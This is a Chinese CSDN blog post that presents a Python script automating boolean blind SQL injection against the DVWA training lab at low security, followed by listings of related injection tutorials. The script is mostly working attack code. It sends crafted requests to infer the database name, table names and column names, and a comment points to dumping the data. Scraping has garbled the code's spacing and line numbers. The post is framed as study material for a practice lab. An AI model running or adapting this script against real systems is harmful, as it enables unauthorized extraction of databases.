python脚本自动化盲注_python dvwa布尔盲注自动化脚本(level=low)

最新推荐文章于 2024-04-27 00:18:29 发布
最新推荐文章于 2024-04-27 00:18:29 发布
阅读量244 收藏
点赞数
文章标签: python脚本自动化盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36450592/article/details/112964657
版权
这篇博客演示了一个使用Python编写的自动化脚本,用于针对DVWA进行布尔型SQL盲注。脚本通过猜解数据库名、长度,数据库表的数量和名称,以及表中的列名,展示了SQL盲注的过程。目的是为了学习和理解自动化SQL注入攻击的方法。
摘要由CSDN通过智能技术生成

仅供学习代码参考

1#python dvwa布尔盲注自动化脚本

2 importrequests3 importstring4 importtime5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="

6 token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别

7 COLUMN_NUM=11

8 COLUMN_LEN=15

9 dbLen=010 dbname=''

11 table_num=012 table=[]13 table_name='' #暂存用

14 column=[]15 column_name=''#暂存用

16 rightLen=017

18 time_start=time.time()19 url=INIT_URL+"1&Submit=Submit#"

20 rightLen=len(requests.get(url=url,cookies=token).text)21 print("正常返回文本长度:"+str(rightLen))22 #1.猜解数据库名长度 poc:" 1'and (select length(database()))="+str(dbLen)#"

23 whileTrue:24 dbLen +=1

25 dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"

26 print(dbUrl)27 if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:28 print("数据库长度:"+str(dbLen))29 break

30 #2.猜解数据库名字 poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"

31 for i in range(1,dbLen+1):32 for j instring.ascii_lowercase:33 dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"

34 print(dbnameUrl)35 if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:36 dbname+=j37 break

38

39 print("数据库名字:"+dbname)40

41 #3.猜解数据库表数量 poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"

42

43 for i in range(100):44 dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"

45 print(dbUrl)46 if len(requests.get(dbUrl,cookies=token).text)==rightLen:47 print("表数量"+str(i))48 table_num=i49 break

50

51 #4.猜解表名 poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#

52

53 for i inrange(table_num):54 for k inrange(COLUMN_LEN):55 for j in range(48,123):56 dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"

57 print(dbUrl)58 if len(requests.get(dbUrl,cookies=token).text)==rightLen:59 table_name+=chr(j)60 print(table_name)61 break

62 table.append(table_name)63 table_name=''

64 print("表名:"+str(table))65

66

67

68 #5.猜解列名 poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i

69

70

71 for m inrange(table_num):72 for i inrange(COLUMN_NUM):73 for k inrange(COLUMN_LEN):74 for j in range(48,123):75 dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"

76 print(dbUrl)77 if len(requests.get(dbUrl,cookies=token).text)==rightLen:78 column_name+=chr(j)79 print(column_name)80 break

81 column_name+='/'

82 column.append(column_name)83 column_name=''

84 print("列名:"+str(column))85

86 time_end=time.time()87 print('用时:',time_end-time_start,'s')88 print("正常返回文本长度:"+str(rightLen))89 print("数据库长度:"+str(dbLen))90 print("数据库名字:"+dbname)91 print("表数量"+str(i))92 print("表名:"+str(table))93 print("列名:"+str(column))94 #6.拖库 poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i

95 #具体列具体猜解,全部猜解时间太高

史高拔
关注
基于DVWA靶场的盲注脚本
altersueyunsheng的博客
05-28 466
基于DVWA的自动盲注脚本 本文针对的是dvwa盲注部分的low级别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔盲注 dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断,盲注 str = f'?id={sql}&am
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA之 SQL Injection(Blind)
谢公子的博客
08-05 2783
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
词达人小工具2
最新发布
m0_61369360的博客
04-27 338
【代码】词达人小工具2。
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3339
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
python脚本自动化盲注_基于布尔盲注python脚本
weixin_32256861的博客
01-15 314
1 #coding:utf-82 importrequests34 #获取数据库名长度5 defdatabase_len():6 for i in range(1, 10):7 url = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''8 payload = '''?id=1' and length(dat...
DVWA全套学习打靶通关教程
weixin_56910965的博客
06-29 2439
Dvwa暴力破解 命令注入
[笔记]渗透测试基础 - DVWA1.9
NEWU
11-02 660
暴力破解(Brute Force)演练low/medium:burpsuite方法重放穷举 high:python脚本构造数据包过token impossible: noway命令注入(Command injection)命令注入流程1.是否调用命令? 2.函数或函数的参数是否可控 3.是否拼接注入命令演练low: 127.0.0.1&&net user medium: 127.0.0.
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3231
学习sqlmap自动注入
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL Injection4(sqlmap)
kid的博客
04-12 429
SQL Injection4(sqlmap) 前言 前面把手工注入算是简单的练习了一遍,这里来学习下sqlmap,感受下工具的强大。主要也是针对dvwa的sql注入和盲注用sqlmap再来一遍,然后试下文件的上传下载等功能。算是对sqlmap的一个入门吧。 参数 sqlmap的参数真的很多,下面这篇博客把所有sqlmap -hh的参数都进行了中文翻译,挺方便后面查阅的 超详细SQLMap使用攻略及...
渗透工具Sqlmap手册—史上最全!最详细手册!
m0_59991869的博客
10-14 421
一.介绍 开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入 支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 戳此获取网络安全资源 二.基本参数 —upd
Python之路 | 布尔盲注延时EXP编写
IerkeU的博客
03-29 899
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
mysql 盲注二分法python脚本
weixin_30384217的博客
04-29 1350
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
python脚本布尔盲注
ro4lsc的博客
04-21 7147
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
SQL时间盲注python脚本
来到了学渣的博客
03-28 4797
环境 Sql-lib靶机 Python3.8 Request、time库 分析 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22--+ 无触发,用时182毫秒 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22%20and%20sleep(3)%20--+ 用时3.14秒 ...
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1257
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
DVWA 盲注 high python代码注入
weixin_48083470的博客
05-29 311
DVWA 盲注 high python+burpsuite 高等级将输入和页面分离 使用burpsuite 分析页面工作原理 **代码很简单 没有使用二分查找 ** import requests url = "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" #url为显示页面的url keylist = [chr(i) for i in range(32, 127)] #包括数字、大小写字母、特殊字符 answer =
python的sql盲注dvwa
09-23
Python的SQL盲注是指通过构造特定的SQL语句来绕过应用程序的安全机制,并获取未经授权的数据。在DVWA漏洞测试环境中进行SQL盲注,可以使用sqlmap工具。下面是使用sqlmap进行DVWA的SQL盲注的步骤: 1. 首先,确保你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值